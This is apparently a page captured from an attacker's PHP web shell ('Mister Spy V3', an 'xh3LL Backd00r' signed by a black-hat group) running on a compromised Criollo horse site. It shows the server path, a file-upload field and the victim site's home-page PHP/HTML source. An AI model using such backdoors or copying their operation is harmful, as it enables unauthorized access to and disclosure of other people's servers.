Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/.trash/
Upload File :
Current File : /home/caballoscriollos/.trash/home_maro.php

<?php

require_once('inc_library.php');

$oVideos 			= new Videos();
$oGaleriaImagenes 	= new GaleriaImagenes();

/* obtenemos los ultimos 3 videos */
$arrVideos 		= $oVideos->GetLast(3);
$arrImagenes	= $oGaleriaImagenes->GetLast(4);
$VideoPrincipal = "";

/* determinamos el video principal */
if ($arrVideos)
{
	$VideoPrincipal = $arrVideos[0]->Url;
	
	/* configuramos width */
	$VideoPrincipal = VideoSetWidth($VideoPrincipal, 375);
	
	/* configuramos */
	$VideoPrincipal = VideoSetHeight($VideoPrincipal, 294);
}

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templates/base_espanol.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<!-- InstanceBeginEditable name="doctitle" -->
<title>Caballos Criollos TV</title>
<!-- InstanceEndEditable -->
<!-- InstanceBeginEditable name="head" -->
<script src="../Scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<link rel="stylesheet" href="../css/lightbox.css" type="text/css" media="screen" />
<script src="js/prototype.js" type="text/javascript"></script>
<script src="js/scriptaculous.js?load=effects" type="text/javascript"></script>
<script src="js/lightbox.js" type="text/javascript"></script>
<!-- InstanceEndEditable -->
<link href="../css/basico_frontend.css" rel="stylesheet" type="text/css" />
</head>

<body>
<div align="center"><?php include("ssi_cabezal.php"); ?>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td width="20">&nbsp;</td>
    <td>&nbsp;</td>
    <td width="20">&nbsp;</td>
  </tr>
  <tr>
    <td width="20">&nbsp;</td>
    <td><!-- InstanceBeginEditable name="Contenido" -->
      <table width="100%" border="0" cellspacing="0" cellpadding="0">
        <?php if ($arrVideos){ ?>
        <tr>
          <td><table width="100%" border="0" cellspacing="0" cellpadding="0">
            <tr valign="top">
              <td width="390"><table width="100%" border="0" cellspacing="0" cellpadding="0">
                <tr>
                  <td height="30" valign="top"><span class="tituloNoticia">Remate - Redomones</span></td>
                  </tr>
                <tr valign="top">
                  <td><object width="375" height="281"><param name="movie" value="http://www.youtube.com/v/MehTzyEx9aw?version=3&amp;hl=es_MX"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/MehTzyEx9aw?version=3&amp;hl=es_MX" type="application/x-shockwave-flash" width="375" height="281" allowscriptaccess="always" allowfullscreen="true"></embed></object></td>
                  </tr>
                <tr valign="top">
                  <td>&nbsp;</td>
                </tr>
                </table></td>
              <td width="10">&nbsp;</td>
              <td><table width="100%" border="0" cellspacing="0" cellpadding="0">
                
                <tr>
                  <td height="80" valign="top"><a href="contacto.php"><img src="images/banner_walter_albornoz.jpg" alt="Enviale un mensaje a Walter" width="361" height="67" border="0" title="Enviale un mensaje a Walter" /></a></td>
                  </tr>
                <tr>
                  <td><div align="center" id="fondo">
                    <div align="left">MULTIMEDIA</div>
                    </div></td>
                  </tr>
                <tr>
                  <td height="10"><div align="center"></div></td>
                  </tr>
                <tr>
                  <td><table width="100%" border="0" cellspacing="0" cellpadding="0">
                    <?php $Count = 0; ?>
                    <?php foreach ($arrVideos as $oVideo){ $Count ++; if ($Count == 1) continue;?>
                    <tr>
                      <td valign="top"><strong><a href="videos_detalle.php?IdVideo=<?=$oVideo->IdVideo?>" class="linkBasico"></a></strong>
                        <table width="100%" border="0" cellspacing="0" cellpadding="0">
                          <tr>
                            <td width="130"><div align="left"><a href="videos_detalle.php?IdVideo=<?=$oVideo->IdVideo?>" class="linkBasico">
                              <?=GetUrlImagenVideoYouTube($oVideo->Url); ?>
                              </a> </div></td>
                            <td valign="top"><table width="100%" border="0" align="right" cellpadding="0" cellspacing="0">
                              <tr>
                                <td height="20"><a href="videos_detalle.php?IdVideo=<?=$oVideo->IdVideo?>" class="linkTitulo">
                                  <?=$oVideo->Nombre?>
                                  </a></td>
                                </tr>
                              <tr>
                                <td width="80">
                                  <div align="left">
                                    <?php if ($oVideo->Url != ''){ ?><a href="videos_detalle.php?IdVideo=<?=$oVideo->IdVideo?>" class="linkBasico" title="Ver video">[Ver video]</a>
                                    <?php } ?>
                                    </div></td>
                                </tr>
                              </table></td>
                            </tr>
                          </table></td>
                      </tr>
                    <tr>
                      <td height="20"><div align="center">
                        <table width="100%" border="0" cellspacing="0" cellpadding="0">
                          <tr>
                            <td height="1" background="images/linea_punteada.gif"><div align="center"></div></td>
                            </tr>
                          </table>
                        </div>                        </td>
                      </tr>
                    <?php } ?>
                    </table></td>
                  </tr>
                <tr>
                  <td height="15" valign="bottom"><div align="right"><a href="videos.php" class="linkBlanco">[ver todos los programas]</a></div></td>
                  </tr>
                </table></td>
              </tr>
            </table></td>
          </tr>
        <?php } ?>
        <tr>
          <td>&nbsp;</td>
          </tr>
        <tr>
          <td><table width="100%" border="0" cellspacing="0" cellpadding="0">
            <tr>
              <td valign="top"><table border="0" align="left" cellpadding="0" cellspacing="0">
                <tr>
                  <td><img src="images/svb.jpg" width="360" height="28" alt="SVB" /></td>
                  </tr>
                <tr>
                  <td>&nbsp;</td>
                  </tr>
                <tr>
                  <td><a href="http://www.prediorural.com/espanol/home.php" target="_blank"><img src="images/remates.gif" alt="" width="361" height="250" border="0" /></a></td>
                </tr>
                </table></td>
              <td colspan="2" valign="top"><div align="right">
                <table border="0" align="right" cellpadding="0" cellspacing="0">
                  <tr>
                    <td><span class="tituloNoticia">VENTA DE SERVICIOS</span></td>
                    </tr>
                  <tr>
                    <td>&nbsp;</td>
                    </tr>
                  <tr>
                    <td><a href="listado.php"><img src="images/banner_padrillos.jpg" width="361" height="250" border="0" /></a></td>
                    </tr>
                  </table>
              </div></td>
            </tr>
            </table>            
            <a href="listado.php"></a></td>
          </tr>
        <tr>
          <td>&nbsp;</td>
          </tr>
        <tr>
          <td height="25" valign="top"><span class="tituloNoticia"> GALER&Iacute;AS SOCIALES</span></td>
          </tr>
        <tr>
          <td align="center">
            <table width="100%" cellpadding="0" cellspacing="0">	
              <tr>
                <td width="180" align="left"><a href="<?=Config::Galeria_ImagenBig . $arrImagenes[0]->Imagen?>" title="<?=$arrImagenes[0]->Epigrafe?>" rel="lightbox[gallery_<?=$oCategoria->IdCategoria?>]"><img src="<?=Config::Galeria_ImagenBig . $arrImagenes[0]->Imagen?>" width="150" alt="<?=$arrImagenes[0]->Epigrafe?>" border="0" /></a></td>
                <td width="180" align="right"><a href="<?=Config::Galeria_ImagenBig . $arrImagenes[1]->Imagen?>" title="<?=$arrImagenes[1]->Epigrafe?>" rel="lightbox[gallery_<?=$oCategoria->IdCategoria?>]"><img src="<?=Config::Galeria_ImagenBig . $arrImagenes[1]->Imagen?>" width="150" alt="<?=$oImagen->Epigrafe?>" border="0" /></a></td>
                <td>&nbsp;</td>
                <td width="180" align="left"><a href="<?=Config::Galeria_ImagenBig . $arrImagenes[2]->Imagen?>" title="<?=$arrImagenes[2]->Epigrafe?>" rel="lightbox[gallery_<?=$oCategoria->IdCategoria?>]"><img src="<?=Config::Galeria_ImagenBig . $arrImagenes[2]->Imagen?>" width="150" alt="<?=$arrImagenes[2]->Epigrafe?>" border="0" /></a></td>    
                <td width="180" align="right"><a href="<?=Config::Galeria_ImagenBig . $arrImagenes[3]->Imagen?>" title="<?=$arrImagenes[3]->Epigrafe?>" rel="lightbox[gallery_<?=$oCategoria->IdCategoria?>]"><img src="<?=Config::Galeria_ImagenBig . $arrImagenes[3]->Imagen?>" width="150" alt="<?=$arrImagenes[3]->Epigrafe?>" border="0" /></a></td>
                </tr>
              </table>
            </td>
          </tr>
        <tr>
          <td height="15" valign="bottom"><div align="right"><a href="galeria_imagenes.php" class="linkBlanco">[ver todos las imagenes]</a></div></td>
          </tr>
        <tr>
          <td>&nbsp;</td>
          </tr>
        <tr>
          <td align="center"><img src="images/banner_rienda.jpg" width="760" height="240" /></td>
        </tr>
        <tr>
          <td>&nbsp;</td>
        </tr>
        <tr>
          <td><div align="center"><img src="images/logos_home.jpg" width="760" border="0" usemap="#Map" /> 
            <map name="Map" id="Map">
              <area shape="rect" coords="192,65,258,116" href="http://www.criolloselpaye.com.ar/index.php" target="_blank" />
              <area shape="rect" coords="305,64,398,113" href="http://www.ballenerachica.com.ar/" target="_blank" />
              <area shape="rect" coords="449,62,566,111" href="http://www.saenz-valiente.com.ar/" target="_blank" />
              <area shape="rect" coords="93,7,159,67" href="http://www.santaanacriollos.com/" target="_blank" />
              <area shape="rect" coords="195,13,329,55" href="http://www.criolloslasmulitas.com.ar/" target="_blank" />
              <area shape="rect" coords="359,20,520,46" href="http://www.caballocriollo.com.uy/" target="_blank" />
              <area shape="rect" coords="550,10,651,60" href="http://manosargentinas.com/" target="_blank" />
              </map>
            </div></td>
          </tr>
      </table>
<!-- InstanceEndEditable --></td>
    <td width="20">&nbsp;</td>
  </tr>
  <tr>
    <td width="20">&nbsp;</td>
    <td>&nbsp;</td>
    <td width="20">&nbsp;</td>
  </tr>
</table>
<?php include("ssi_pie.php"); ?>
</div>
</body>
<!-- InstanceEnd --></html>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat